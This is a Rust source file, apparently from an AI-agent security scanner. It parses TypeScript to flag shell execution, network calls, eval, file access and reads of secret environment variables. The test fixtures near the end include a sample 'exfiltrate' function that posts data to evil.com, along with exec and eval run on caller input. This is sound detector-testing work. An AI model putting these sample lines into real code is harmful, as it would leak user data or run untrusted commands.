Skip to main content

agentshield/parser/
typescript.rs

1use std::collections::HashSet;
2use std::path::{Path, PathBuf};
3
4use once_cell::sync::Lazy;
5use regex::Regex;
6
7use super::{CallSite, FunctionDef, FunctionParam, LanguageParser, ParsedFile};
8use crate::analysis::cross_file::{sanitizer_category, sanitizer_label, SanitizerCategory};
9use crate::error::Result;
10use crate::ir::execution_surface::*;
11use crate::ir::{ArgumentSource, Language, SourceLocation};
12
13pub struct TypeScriptParser;
14
15// ── Dangerous patterns ───────────────────────────────────────────
16
17static EXEC_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
18    vec![
19        "exec",
20        "execSync",
21        "execFile",
22        "execFileSync",
23        "spawn",
24        "spawnSync",
25        "child_process.exec",
26        "child_process.execSync",
27        "child_process.execFile",
28        "child_process.execFileSync",
29        "child_process.spawn",
30        "child_process.spawnSync",
31        "cp.exec",
32        "cp.execSync",
33        "cp.spawn",
34        "cp.spawnSync",
35        "shelljs.exec",
36        "execa",
37        "execaSync",
38    ]
39});
40
41static NETWORK_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
42    vec![
43        "fetch",
44        "http.get",
45        "http.request",
46        "https.get",
47        "https.request",
48        "axios",
49        "axios.get",
50        "axios.post",
51        "axios.put",
52        "axios.patch",
53        "axios.delete",
54        "axios.request",
55        "got",
56        "got.get",
57        "got.post",
58        "got.put",
59        "got.patch",
60        "got.delete",
61        "request",
62        "request.get",
63        "request.post",
64        "superagent.get",
65        "superagent.post",
66        "undici.fetch",
67        "undici.request",
68    ]
69});
70
71static FILE_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
72    vec![
73        "readFile",
74        "readFileSync",
75        "writeFile",
76        "writeFileSync",
77        "appendFile",
78        "appendFileSync",
79        "unlink",
80        "unlinkSync",
81        "readdir",
82        "readdirSync",
83        "fs.readFile",
84        "fs.readFileSync",
85        "fs.writeFile",
86        "fs.writeFileSync",
87        "fs.appendFile",
88        "fs.appendFileSync",
89        "fs.unlink",
90        "fs.unlinkSync",
91        "fs.readdir",
92        "fs.readdirSync",
93        "fs.promises.readFile",
94        "fs.promises.writeFile",
95        "fs.promises.unlink",
96        "fs.promises.readdir",
97        "Deno.readTextFile",
98        "Deno.writeTextFile",
99        "Deno.readFile",
100        "Deno.writeFile",
101        "Bun.file",
102    ]
103});
104
105static DYNAMIC_EXEC_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
106    vec![
107        "eval",
108        "Function",
109        "vm.runInThisContext",
110        "vm.runInNewContext",
111    ]
112});
113
114static SENSITIVE_ENV_VARS: Lazy<Regex> = Lazy::new(|| {
115    Regex::new(r"(?i)(AWS_|SECRET|TOKEN|PASSWORD|API_KEY|PRIVATE_KEY|CREDENTIALS|AUTH)").unwrap()
116});
117
118// Template literal with interpolation: `...${expr}...`
119static TEMPLATE_LITERAL_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r"\$\{[^}]+\}").unwrap());
120
121// Sanitizer assignment: const validPath = await validatePath(x)
122// Captures: (1) variable name, (2) function name (possibly dotted)
123static SANITIZER_ASSIGN_RE: Lazy<Regex> = Lazy::new(|| {
124    Regex::new(r"(?:const|let|var)\s+(\w+)\s*=\s*(?:await\s+)?(\w+(?:\.\w+)*)\s*\(").unwrap()
125});
126
127// ── tree-sitter AST parser ──────────────────────────────────────
128
129#[cfg(feature = "typescript")]
130impl LanguageParser for TypeScriptParser {
131    fn language(&self) -> Language {
132        Language::TypeScript
133    }
134
135    fn parse_file(&self, path: &Path, content: &str) -> Result<ParsedFile> {
136        let mut parser = tree_sitter::Parser::new();
137        let is_tsx = path
138            .extension()
139            .is_some_and(|ext| ext == "tsx" || ext == "jsx");
140
141        let lang = if is_tsx {
142            tree_sitter_typescript::LANGUAGE_TSX
143        } else {
144            tree_sitter_typescript::LANGUAGE_TYPESCRIPT
145        };
146
147        parser
148            .set_language(&lang.into())
149            .map_err(|e| crate::error::ShieldError::Parse {
150                file: path.display().to_string(),
151                message: format!("Failed to load TypeScript grammar: {e}"),
152            })?;
153
154        let tree = parser
155            .parse(content, None)
156            .ok_or_else(|| crate::error::ShieldError::Parse {
157                file: path.display().to_string(),
158                message: "tree-sitter failed to parse TypeScript".into(),
159            })?;
160
161        let file_path = PathBuf::from(path);
162        let source = content.as_bytes();
163        let mut parsed = ParsedFile::default();
164        let mut param_names = HashSet::new();
165
166        // Phase 0: Detect sanitizer assignments via regex on source text
167        detect_sanitizer_assignments(content, &mut parsed.sanitized_vars);
168
169        // Phase 1: Collect function parameters + function defs
170        collect_params(
171            tree.root_node(),
172            source,
173            &file_path,
174            &mut param_names,
175            &mut parsed,
176        );
177
178        // Phase 2: Walk AST for call expressions, call sites, and env accesses
179        walk_node(
180            tree.root_node(),
181            source,
182            &file_path,
183            &param_names,
184            &mut parsed,
185        );
186
187        Ok(parsed)
188    }
189}
190
191/// Recursively collect function/method/arrow parameter names + FunctionDef entries.
192#[cfg(feature = "typescript")]
193fn collect_params(
194    node: tree_sitter::Node,
195    source: &[u8],
196    file_path: &Path,
197    param_names: &mut HashSet<String>,
198    parsed: &mut ParsedFile,
199) {
200    let kind = node.kind();
201
202    // Function declarations, arrow functions, method definitions
203    if kind == "function_declaration"
204        || kind == "function"
205        || kind == "arrow_function"
206        || kind == "method_definition"
207        || kind == "function_expression"
208    {
209        let func_name = extract_function_name(node, source).unwrap_or_default();
210        let mut func_params = Vec::new();
211
212        if let Some(params_node) = node.child_by_field_name("parameters") {
213            for i in 0..params_node.named_child_count() {
214                if let Some(param) = params_node.named_child(i) {
215                    for name in extract_param_names(param, source) {
216                        if name != "this" {
217                            param_names.insert(name.clone());
218                            func_params.push(name.clone());
219                            parsed.function_params.push(FunctionParam {
220                                function_name: func_name.clone(),
221                                param_name: name,
222                                location: loc(file_path, param),
223                            });
224                        }
225                    }
226                }
227            }
228        }
229
230        // Record FunctionDef if we have a name
231        if !func_name.is_empty() {
232            let is_exported = is_exported_node(node, source);
233            parsed.function_defs.push(FunctionDef {
234                name: func_name,
235                params: func_params,
236                is_exported,
237                location: loc(file_path, node),
238            });
239        }
240    }
241
242    // Recurse
243    for i in 0..node.named_child_count() {
244        if let Some(child) = node.named_child(i) {
245            collect_params(child, source, file_path, param_names, parsed);
246        }
247    }
248}
249
250/// Check if a function node is exported (has `export` keyword in ancestors or declaration).
251#[cfg(feature = "typescript")]
252fn is_exported_node(node: tree_sitter::Node, source: &[u8]) -> bool {
253    // Check if the function/arrow is inside an export_statement
254    let mut current = node;
255    while let Some(parent) = current.parent() {
256        let pk = parent.kind();
257        if pk == "export_statement" {
258            return true;
259        }
260        // Stop at top-level statements
261        if pk == "program" || pk == "statement_block" {
262            break;
263        }
264        current = parent;
265    }
266    // Check for `module.exports` pattern — look at the parent variable_declarator
267    // e.g., module.exports.func = function(...) {}
268    if let Some(parent) = node.parent() {
269        let parent_text = node_text(parent, source);
270        if parent_text.contains("module.exports") || parent_text.contains("exports.") {
271            return true;
272        }
273    }
274    false
275}
276
277/// Extract a function's name from its AST node.
278#[cfg(feature = "typescript")]
279fn extract_function_name(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
280    // For function_declaration/method_definition: name field
281    if let Some(name_node) = node.child_by_field_name("name") {
282        return Some(node_text(name_node, source).to_string());
283    }
284
285    // For arrow functions assigned to variables: look at parent
286    // const handler = async (params) => { ... }
287    if node.kind() == "arrow_function" || node.kind() == "function_expression" {
288        if let Some(parent) = node.parent() {
289            if parent.kind() == "variable_declarator" {
290                if let Some(name_node) = parent.child_by_field_name("name") {
291                    return Some(node_text(name_node, source).to_string());
292                }
293            }
294        }
295    }
296
297    None
298}
299
300/// Extract parameter name(s) from a formal_parameters child node.
301/// Returns a Vec because destructured patterns yield multiple names.
302#[cfg(feature = "typescript")]
303fn extract_param_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
304    match node.kind() {
305        // required_parameter or optional_parameter: has "pattern" field
306        "required_parameter" | "optional_parameter" => {
307            if let Some(pattern) = node.child_by_field_name("pattern") {
308                if pattern.kind() == "identifier" {
309                    return vec![node_text(pattern, source).to_string()];
310                }
311                // Destructured object pattern: { url, name } => ["url", "name"]
312                if pattern.kind() == "object_pattern" {
313                    return extract_object_pattern_names(pattern, source);
314                }
315                // Destructured array pattern: [a, b] => ["a", "b"]
316                if pattern.kind() == "array_pattern" {
317                    return extract_array_pattern_names(pattern, source);
318                }
319            }
320            vec![]
321        }
322        // Rest parameter: ...args
323        "rest_pattern" => {
324            for i in 0..node.named_child_count() {
325                if let Some(child) = node.named_child(i) {
326                    if child.kind() == "identifier" {
327                        return vec![node_text(child, source).to_string()];
328                    }
329                }
330            }
331            vec![]
332        }
333        // Plain identifier (JS-style params without type annotations)
334        "identifier" => vec![node_text(node, source).to_string()],
335        _ => vec![],
336    }
337}
338
339/// Extract property names from an object destructuring pattern: { url, name }
340#[cfg(feature = "typescript")]
341fn extract_object_pattern_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
342    let mut names = Vec::new();
343    for i in 0..node.named_child_count() {
344        if let Some(child) = node.named_child(i) {
345            match child.kind() {
346                // shorthand_property_identifier_pattern: { url } => "url"
347                "shorthand_property_identifier_pattern" => {
348                    names.push(node_text(child, source).to_string());
349                }
350                // pair_pattern: { url: myUrl } => "myUrl"
351                "pair_pattern" => {
352                    if let Some(value) = child.child_by_field_name("value") {
353                        if value.kind() == "identifier" {
354                            names.push(node_text(value, source).to_string());
355                        }
356                    }
357                }
358                _ => {}
359            }
360        }
361    }
362    names
363}
364
365/// Extract names from an array destructuring pattern: [a, b]
366#[cfg(feature = "typescript")]
367fn extract_array_pattern_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
368    let mut names = Vec::new();
369    for i in 0..node.named_child_count() {
370        if let Some(child) = node.named_child(i) {
371            if child.kind() == "identifier" {
372                names.push(node_text(child, source).to_string());
373            }
374        }
375    }
376    names
377}
378
379/// Walk the AST looking for call_expression and member_expression (for env access).
380#[cfg(feature = "typescript")]
381fn walk_node(
382    node: tree_sitter::Node,
383    source: &[u8],
384    file_path: &Path,
385    param_names: &HashSet<String>,
386    parsed: &mut ParsedFile,
387) {
388    let kind = node.kind();
389
390    // Check for process.env access: process.env.VAR or process.env["VAR"]
391    if kind == "member_expression" || kind == "subscript_expression" {
392        let text = node_text(node, source);
393        if text.starts_with("process.env") {
394            let var_name = extract_env_var_name(node, source);
395            if let Some(name) = &var_name {
396                let is_sensitive = SENSITIVE_ENV_VARS.is_match(name);
397                parsed.env_accesses.push(EnvAccess {
398                    var_name: ArgumentSource::Literal(name.clone()),
399                    is_sensitive,
400                    location: loc(file_path, node),
401                });
402            }
403        }
404    }
405
406    // Check for call_expression
407    if kind == "call_expression" {
408        if let Some(func_node) = node.child_by_field_name("function") {
409            let func_name = resolve_call_name(func_node, source);
410
411            // Classify all arguments (not just the first) for CallSite recording
412            let args_node = node.child_by_field_name("arguments");
413            let all_arg_sources =
414                classify_all_arguments(args_node, source, param_names, &parsed.sanitized_vars);
415
416            // First argument source for existing detector logic
417            let arg_source = all_arg_sources
418                .first()
419                .cloned()
420                .unwrap_or(ArgumentSource::Unknown);
421
422            // Record CallSite for cross-file analysis
423            let caller_name = find_enclosing_function(node, source);
424            parsed.call_sites.push(CallSite {
425                callee: func_name.clone(),
426                arguments: all_arg_sources,
427                caller: caller_name,
428                location: loc(file_path, node),
429            });
430
431            // Command execution
432            if matches_pattern(&func_name, &EXEC_PATTERNS) {
433                parsed.commands.push(CommandInvocation {
434                    function: func_name.clone(),
435                    command_arg: arg_source.clone(),
436                    location: loc(file_path, node),
437                });
438            }
439
440            // Network operations
441            if matches_pattern(&func_name, &NETWORK_PATTERNS) {
442                let full_args_text = node
443                    .child_by_field_name("arguments")
444                    .map(|a| node_text(a, source).to_string())
445                    .unwrap_or_default();
446                let sends_data = func_name.contains("post")
447                    || func_name.contains("put")
448                    || func_name.contains("patch")
449                    || full_args_text.contains("body:")
450                    || full_args_text.contains("data:");
451                let method = if func_name.contains("get") {
452                    Some("GET".into())
453                } else if func_name.contains("post") {
454                    Some("POST".into())
455                } else if func_name.contains("put") {
456                    Some("PUT".into())
457                } else {
458                    None
459                };
460                parsed.network_operations.push(NetworkOperation {
461                    function: func_name.clone(),
462                    url_arg: arg_source.clone(),
463                    method,
464                    sends_data,
465                    location: loc(file_path, node),
466                });
467            }
468
469            // Dynamic execution
470            if DYNAMIC_EXEC_PATTERNS.contains(&func_name.as_str()) {
471                parsed.dynamic_exec.push(DynamicExec {
472                    function: func_name.clone(),
473                    code_arg: arg_source.clone(),
474                    location: loc(file_path, node),
475                });
476            }
477
478            // File operations
479            if matches_pattern(&func_name, &FILE_PATTERNS) {
480                let op_type = if func_name.contains("write") || func_name.contains("append") {
481                    FileOpType::Write
482                } else if func_name.contains("unlink") {
483                    FileOpType::Delete
484                } else if func_name.contains("readdir") {
485                    FileOpType::List
486                } else {
487                    FileOpType::Read
488                };
489                parsed.file_operations.push(FileOperation {
490                    operation: op_type,
491                    path_arg: arg_source.clone(),
492                    location: loc(file_path, node),
493                });
494            }
495        }
496    }
497
498    // Recurse into children (skip already-processed subtrees)
499    for i in 0..node.named_child_count() {
500        if let Some(child) = node.named_child(i) {
501            walk_node(child, source, file_path, param_names, parsed);
502        }
503    }
504}
505
506/// Classify all arguments in a call expression (tree-sitter path).
507#[cfg(feature = "typescript")]
508fn classify_all_arguments(
509    args_node: Option<tree_sitter::Node>,
510    source: &[u8],
511    param_names: &HashSet<String>,
512    sanitized_vars: &HashSet<String>,
513) -> Vec<ArgumentSource> {
514    let Some(args) = args_node else {
515        return Vec::new();
516    };
517    let mut result = Vec::new();
518    for i in 0..args.named_child_count() {
519        if let Some(arg) = args.named_child(i) {
520            let arg_text = node_text(arg, source).to_string();
521            result.push(classify_argument_with_sanitizers(
522                &arg_text,
523                param_names,
524                sanitized_vars,
525            ));
526        }
527    }
528    result
529}
530
531/// Find the enclosing function name for a node (for caller tracking).
532#[cfg(feature = "typescript")]
533fn find_enclosing_function(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
534    let mut current = node;
535    while let Some(parent) = current.parent() {
536        let pk = parent.kind();
537        if pk == "function_declaration"
538            || pk == "function"
539            || pk == "arrow_function"
540            || pk == "method_definition"
541            || pk == "function_expression"
542        {
543            return extract_function_name(parent, source);
544        }
545        current = parent;
546    }
547    None
548}
549
550/// Resolve a call expression's function name from its AST node.
551/// Handles: identifier, member_expression chains (a.b.c), optional_chain.
552#[cfg(feature = "typescript")]
553fn resolve_call_name(node: tree_sitter::Node, source: &[u8]) -> String {
554    match node.kind() {
555        "identifier" => node_text(node, source).to_string(),
556        "member_expression" | "optional_chain_expression" => {
557            // Flatten the member chain: a.b.c
558            node_text(node, source).replace(['\n', ' '], "").to_string()
559        }
560        _ => node_text(node, source).to_string(),
561    }
562}
563
564/// Extract environment variable name from process.env access.
565#[cfg(feature = "typescript")]
566fn extract_env_var_name(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
567    let text = node_text(node, source);
568    // process.env.VAR_NAME
569    if let Some(rest) = text.strip_prefix("process.env.") {
570        return Some(rest.to_string());
571    }
572    // process.env["VAR_NAME"] or process.env['VAR_NAME']
573    if node.kind() == "subscript_expression" {
574        if let Some(index) = node.child_by_field_name("index") {
575            let idx_text = node_text(index, source);
576            let trimmed = idx_text.trim_matches('"').trim_matches('\'').to_string();
577            if !trimmed.is_empty() {
578                return Some(trimmed);
579            }
580        }
581    }
582    None
583}
584
585/// Get the text of a tree-sitter node.
586#[cfg(feature = "typescript")]
587fn node_text<'a>(node: tree_sitter::Node, source: &'a [u8]) -> &'a str {
588    node.utf8_text(source).unwrap_or("")
589}
590
591/// Build a SourceLocation from a tree-sitter node (1-indexed lines).
592#[cfg(feature = "typescript")]
593fn loc(file: &Path, node: tree_sitter::Node) -> SourceLocation {
594    let start = node.start_position();
595    let end = node.end_position();
596    SourceLocation {
597        file: file.to_path_buf(),
598        line: start.row + 1,
599        column: start.column,
600        end_line: Some(end.row + 1),
601        end_column: Some(end.column),
602    }
603}
604
605// ── Shared sanitizer detection ──────────────────────────────────
606
607/// Detect sanitizer assignments in source code and populate sanitized_vars.
608/// Matches patterns like: `const validPath = await validatePath(x)`
609fn detect_sanitizer_assignments(content: &str, sanitized_vars: &mut HashSet<String>) {
610    for cap in SANITIZER_ASSIGN_RE.captures_iter(content) {
611        let var_name = &cap[1];
612        let func_name = &cap[2];
613        if sanitizer_category(func_name)
614            .is_some_and(|category| !matches!(category, SanitizerCategory::Redaction))
615        {
616            sanitized_vars.insert(var_name.to_string());
617            if let Some(label) = sanitizer_label(func_name) {
618                sanitized_vars.insert(sanitized_var_marker(var_name, &label));
619            }
620        }
621    }
622}
623
624fn sanitized_var_marker(var_name: &str, sanitizer_label: &str) -> String {
625    format!("{var_name}::{sanitizer_label}")
626}
627
628fn sanitized_label_for_var(ident: &str, sanitized_vars: &HashSet<String>) -> Option<String> {
629    for category in [
630        SanitizerCategory::Path,
631        SanitizerCategory::Network,
632        SanitizerCategory::TypeCoercion,
633    ] {
634        let prefix = format!("{}:", category.as_str());
635        if let Some(marker) = sanitized_vars
636            .iter()
637            .find(|value| value.starts_with(&format!("{ident}::{prefix}")))
638        {
639            return marker.split_once("::").map(|(_, label)| label.to_string());
640        }
641    }
642
643    sanitized_vars.contains(ident).then(|| ident.to_string())
644}
645
646/// Classify an argument, considering sanitized variables.
647fn classify_argument_with_sanitizers(
648    arg_text: &str,
649    param_names: &HashSet<String>,
650    sanitized_vars: &HashSet<String>,
651) -> ArgumentSource {
652    let first_arg = arg_text.split(',').next().unwrap_or("").trim();
653
654    if first_arg.is_empty() {
655        return ArgumentSource::Unknown;
656    }
657
658    // Check if this is a sanitized variable (before other checks)
659    let ident = first_arg.split('.').next().unwrap_or(first_arg);
660    let ident = ident.split('[').next().unwrap_or(ident);
661    if let Some(sanitizer) = sanitized_label_for_var(ident, sanitized_vars) {
662        return ArgumentSource::Sanitized { sanitizer };
663    }
664
665    // Delegate to existing classification
666    classify_argument_text(first_arg, param_names)
667}
668
669// ── Regex fallback parser (when typescript feature is disabled) ──
670
671#[cfg(not(feature = "typescript"))]
672static CALL_RE: Lazy<Regex> =
673    Lazy::new(|| Regex::new(r"(?m)(\w+(?:\.\w+)*)\s*\(([^)]*)\)").unwrap());
674
675#[cfg(not(feature = "typescript"))]
676static ENV_ACCESS_RE: Lazy<Regex> = Lazy::new(|| {
677    Regex::new(r#"(?m)process\.env\s*(?:\[\s*["']([^"']+)["']\s*\]|\.([A-Z_][A-Z0-9_]*))"#).unwrap()
678});
679
680#[cfg(not(feature = "typescript"))]
681static FUNC_DEF_RE: Lazy<Regex> = Lazy::new(|| {
682    Regex::new(
683        r"(?m)(?:(?:export\s+)?(?:async\s+)?function\s+(\w+)\s*\(([^)]*)\)|(?:const|let|var)\s+(\w+)\s*=\s*(?:async\s+)?\(([^)]*)\)\s*(?:=>|:\s*\w+\s*=>)|(\w+)\s*\(([^)]*)\)\s*(?::\s*\w+\s*)?\{)"
684    ).unwrap()
685});
686
687#[cfg(not(feature = "typescript"))]
688impl LanguageParser for TypeScriptParser {
689    fn language(&self) -> Language {
690        Language::TypeScript
691    }
692
693    fn parse_file(&self, path: &Path, content: &str) -> Result<ParsedFile> {
694        let mut parsed = ParsedFile::default();
695        let file_path = PathBuf::from(path);
696        let mut param_names = HashSet::new();
697
698        // Phase 0: Detect sanitizer assignments
699        detect_sanitizer_assignments(content, &mut parsed.sanitized_vars);
700
701        // Collect function parameter names + FunctionDef entries
702        for cap in FUNC_DEF_RE.captures_iter(content) {
703            let params_str = cap
704                .get(2)
705                .or_else(|| cap.get(4))
706                .or_else(|| cap.get(6))
707                .map(|m| m.as_str())
708                .unwrap_or("");
709            let func_name = cap
710                .get(1)
711                .or_else(|| cap.get(3))
712                .or_else(|| cap.get(5))
713                .map(|m| m.as_str())
714                .unwrap_or("");
715
716            let full_match = cap.get(0).map(|m| m.as_str()).unwrap_or("");
717            let is_exported = full_match.starts_with("export");
718
719            let mut func_params = Vec::new();
720            for param in params_str.split(',') {
721                let param = param.trim();
722                if param.starts_with('{') || param.starts_with('[') {
723                    continue;
724                }
725                let param = param.split(':').next().unwrap_or("").trim();
726                let param = param.split('=').next().unwrap_or("").trim();
727                let param = param.trim_start_matches("...");
728                let param = param.trim_end_matches('?');
729                if !param.is_empty() && param != "this" {
730                    param_names.insert(param.to_string());
731                    func_params.push(param.to_string());
732                    parsed.function_params.push(FunctionParam {
733                        function_name: func_name.to_string(),
734                        param_name: param.to_string(),
735                        location: regex_loc(&file_path, 0),
736                    });
737                }
738            }
739
740            if !func_name.is_empty() {
741                parsed.function_defs.push(FunctionDef {
742                    name: func_name.to_string(),
743                    params: func_params,
744                    is_exported,
745                    location: regex_loc(&file_path, 0),
746                });
747            }
748        }
749
750        // Scan line by line
751        for (line_idx, line) in content.lines().enumerate() {
752            let line_num = line_idx + 1;
753            let trimmed = line.trim();
754
755            if trimmed.starts_with("//") || trimmed.starts_with('*') || trimmed.starts_with("/*") {
756                continue;
757            }
758
759            for cap in ENV_ACCESS_RE.captures_iter(line) {
760                let var_name = cap
761                    .get(1)
762                    .or_else(|| cap.get(2))
763                    .map(|m| m.as_str().to_string())
764                    .unwrap_or_default();
765                let is_sensitive = SENSITIVE_ENV_VARS.is_match(&var_name);
766                parsed.env_accesses.push(EnvAccess {
767                    var_name: ArgumentSource::Literal(var_name),
768                    is_sensitive,
769                    location: regex_loc(&file_path, line_num),
770                });
771            }
772
773            for cap in CALL_RE.captures_iter(line) {
774                let func_name = &cap[1];
775                let args_str = &cap[2];
776                let arg_source = classify_argument_with_sanitizers(
777                    args_str,
778                    &param_names,
779                    &parsed.sanitized_vars,
780                );
781
782                // Record CallSite
783                let all_args = args_str
784                    .split(',')
785                    .map(|a| {
786                        classify_argument_with_sanitizers(
787                            a.trim(),
788                            &param_names,
789                            &parsed.sanitized_vars,
790                        )
791                    })
792                    .collect::<Vec<_>>();
793                parsed.call_sites.push(CallSite {
794                    callee: func_name.to_string(),
795                    arguments: all_args,
796                    caller: None, // Regex path can't easily determine enclosing function
797                    location: regex_loc(&file_path, line_num),
798                });
799
800                if matches_pattern(func_name, &EXEC_PATTERNS) {
801                    parsed.commands.push(CommandInvocation {
802                        function: func_name.to_string(),
803                        command_arg: arg_source.clone(),
804                        location: regex_loc(&file_path, line_num),
805                    });
806                }
807
808                if matches_pattern(func_name, &NETWORK_PATTERNS) {
809                    let sends_data = func_name.contains("post")
810                        || func_name.contains("put")
811                        || func_name.contains("patch")
812                        || args_str.contains("body:")
813                        || args_str.contains("data:");
814                    let method = if func_name.contains("get") {
815                        Some("GET".into())
816                    } else if func_name.contains("post") {
817                        Some("POST".into())
818                    } else if func_name.contains("put") {
819                        Some("PUT".into())
820                    } else {
821                        None
822                    };
823                    parsed.network_operations.push(NetworkOperation {
824                        function: func_name.to_string(),
825                        url_arg: arg_source.clone(),
826                        method,
827                        sends_data,
828                        location: regex_loc(&file_path, line_num),
829                    });
830                }
831
832                if DYNAMIC_EXEC_PATTERNS.contains(&func_name) {
833                    parsed.dynamic_exec.push(DynamicExec {
834                        function: func_name.to_string(),
835                        code_arg: arg_source.clone(),
836                        location: regex_loc(&file_path, line_num),
837                    });
838                }
839
840                if matches_pattern(func_name, &FILE_PATTERNS) {
841                    let op_type = if func_name.contains("write") || func_name.contains("append") {
842                        FileOpType::Write
843                    } else if func_name.contains("unlink") {
844                        FileOpType::Delete
845                    } else if func_name.contains("readdir") {
846                        FileOpType::List
847                    } else {
848                        FileOpType::Read
849                    };
850                    parsed.file_operations.push(FileOperation {
851                        operation: op_type,
852                        path_arg: arg_source.clone(),
853                        location: regex_loc(&file_path, line_num),
854                    });
855                }
856            }
857        }
858
859        Ok(parsed)
860    }
861}
862
863#[cfg(not(feature = "typescript"))]
864fn regex_loc(file: &Path, line: usize) -> SourceLocation {
865    SourceLocation {
866        file: file.to_path_buf(),
867        line,
868        column: 0,
869        end_line: None,
870        end_column: None,
871    }
872}
873
874// ── Shared helpers ──────────────────────────────────────────────
875
876/// Check if a function name matches any pattern in the list.
877fn matches_pattern(func_name: &str, patterns: &[&str]) -> bool {
878    patterns
879        .iter()
880        .any(|p| func_name == *p || func_name.ends_with(p))
881}
882
883/// Classify an argument text to determine its source.
884fn classify_argument_text(arg_text: &str, param_names: &HashSet<String>) -> ArgumentSource {
885    let first_arg = arg_text.split(',').next().unwrap_or("").trim();
886
887    if first_arg.is_empty() {
888        return ArgumentSource::Unknown;
889    }
890
891    // String literal (double or single quoted)
892    if (first_arg.starts_with('"') && first_arg.ends_with('"'))
893        || (first_arg.starts_with('\'') && first_arg.ends_with('\''))
894    {
895        if first_arg.len() >= 2 {
896            let val = &first_arg[1..first_arg.len() - 1];
897            return ArgumentSource::Literal(val.to_string());
898        }
899        return ArgumentSource::Literal(String::new());
900    }
901
902    // Template literal with interpolation: `...${var}...`
903    if first_arg.starts_with('`') {
904        if TEMPLATE_LITERAL_RE.is_match(first_arg) {
905            return ArgumentSource::Interpolated;
906        }
907        let val = first_arg.trim_matches('`');
908        return ArgumentSource::Literal(val.to_string());
909    }
910
911    // String concatenation with +
912    if first_arg.contains('+') && (first_arg.contains('"') || first_arg.contains('\'')) {
913        return ArgumentSource::Interpolated;
914    }
915
916    // process.env reference
917    if first_arg.contains("process.env") {
918        return ArgumentSource::EnvVar {
919            name: first_arg.to_string(),
920        };
921    }
922
923    // Known function parameter
924    let ident = first_arg.split('.').next().unwrap_or(first_arg);
925    let ident = ident.split('[').next().unwrap_or(ident);
926    if param_names.contains(ident) {
927        return ArgumentSource::Parameter {
928            name: ident.to_string(),
929        };
930    }
931
932    ArgumentSource::Unknown
933}
934
935#[cfg(test)]
936mod tests {
937    use super::*;
938
939    #[test]
940    fn detects_exec_with_param() {
941        let code = r#"
942import { exec } from "child_process";
943
944function runCommand(command: string) {
945    exec(command);
946}
947"#;
948        let parsed = TypeScriptParser
949            .parse_file(Path::new("test.ts"), code)
950            .unwrap();
951        assert_eq!(parsed.commands.len(), 1);
952        assert!(matches!(
953            parsed.commands[0].command_arg,
954            ArgumentSource::Parameter { .. }
955        ));
956    }
957
958    #[test]
959    fn detects_spawn_with_interpolation() {
960        let code = r#"
961function run(cmd: string) {
962    exec(`${cmd} --flag`);
963}
964"#;
965        let parsed = TypeScriptParser
966            .parse_file(Path::new("test.ts"), code)
967            .unwrap();
968        assert_eq!(parsed.commands.len(), 1);
969        assert!(matches!(
970            parsed.commands[0].command_arg,
971            ArgumentSource::Interpolated
972        ));
973    }
974
975    #[test]
976    fn detects_fetch_with_param() {
977        let code = r#"
978async function fetchUrl(url: string) {
979    const resp = await fetch(url);
980    return resp.json();
981}
982"#;
983        let parsed = TypeScriptParser
984            .parse_file(Path::new("test.ts"), code)
985            .unwrap();
986        assert_eq!(parsed.network_operations.len(), 1);
987        assert!(matches!(
988            parsed.network_operations[0].url_arg,
989            ArgumentSource::Parameter { .. }
990        ));
991    }
992
993    #[test]
994    fn safe_literal_url_not_flagged() {
995        let code = r#"
996async function getHealth() {
997    const resp = await fetch("https://api.example.com/health");
998    return resp.json();
999}
1000"#;
1001        let parsed = TypeScriptParser
1002            .parse_file(Path::new("test.ts"), code)
1003            .unwrap();
1004        assert_eq!(parsed.network_operations.len(), 1);
1005        assert!(matches!(
1006            parsed.network_operations[0].url_arg,
1007            ArgumentSource::Literal(_)
1008        ));
1009    }
1010
1011    #[test]
1012    fn detects_env_var_access() {
1013        let code = r#"
1014const apiKey = process.env["OPENAI_API_KEY"];
1015const secret = process.env.AWS_SECRET_ACCESS_KEY;
1016"#;
1017        let parsed = TypeScriptParser
1018            .parse_file(Path::new("test.ts"), code)
1019            .unwrap();
1020        assert_eq!(parsed.env_accesses.len(), 2);
1021        assert!(parsed.env_accesses[0].is_sensitive);
1022        assert!(parsed.env_accesses[1].is_sensitive);
1023    }
1024
1025    #[test]
1026    fn detects_eval() {
1027        let code = r#"
1028function execute(code: string) {
1029    eval(code);
1030}
1031"#;
1032        let parsed = TypeScriptParser
1033            .parse_file(Path::new("test.ts"), code)
1034            .unwrap();
1035        assert_eq!(parsed.dynamic_exec.len(), 1);
1036        assert!(matches!(
1037            parsed.dynamic_exec[0].code_arg,
1038            ArgumentSource::Parameter { .. }
1039        ));
1040    }
1041
1042    #[test]
1043    fn detects_file_operations() {
1044        let code = r#"
1045import fs from "fs";
1046
1047function readConfig(path: string) {
1048    return fs.readFileSync(path, "utf-8");
1049}
1050"#;
1051        let parsed = TypeScriptParser
1052            .parse_file(Path::new("test.ts"), code)
1053            .unwrap();
1054        assert_eq!(parsed.file_operations.len(), 1);
1055        assert!(matches!(
1056            parsed.file_operations[0].path_arg,
1057            ArgumentSource::Parameter { .. }
1058        ));
1059    }
1060
1061    #[test]
1062    fn detects_arrow_function_params() {
1063        let code = r#"
1064const handler = async (url: string) => {
1065    const resp = await fetch(url);
1066    return resp.text();
1067};
1068"#;
1069        let parsed = TypeScriptParser
1070            .parse_file(Path::new("test.ts"), code)
1071            .unwrap();
1072        assert_eq!(parsed.network_operations.len(), 1);
1073        assert!(matches!(
1074            parsed.network_operations[0].url_arg,
1075            ArgumentSource::Parameter { .. }
1076        ));
1077    }
1078
1079    #[test]
1080    fn detects_axios_post() {
1081        let code = r#"
1082async function exfiltrate(data: string) {
1083    await axios.post("https://evil.com/steal", { body: data });
1084}
1085"#;
1086        let parsed = TypeScriptParser
1087            .parse_file(Path::new("test.ts"), code)
1088            .unwrap();
1089        assert_eq!(parsed.network_operations.len(), 1);
1090        assert!(parsed.network_operations[0].sends_data);
1091    }
1092
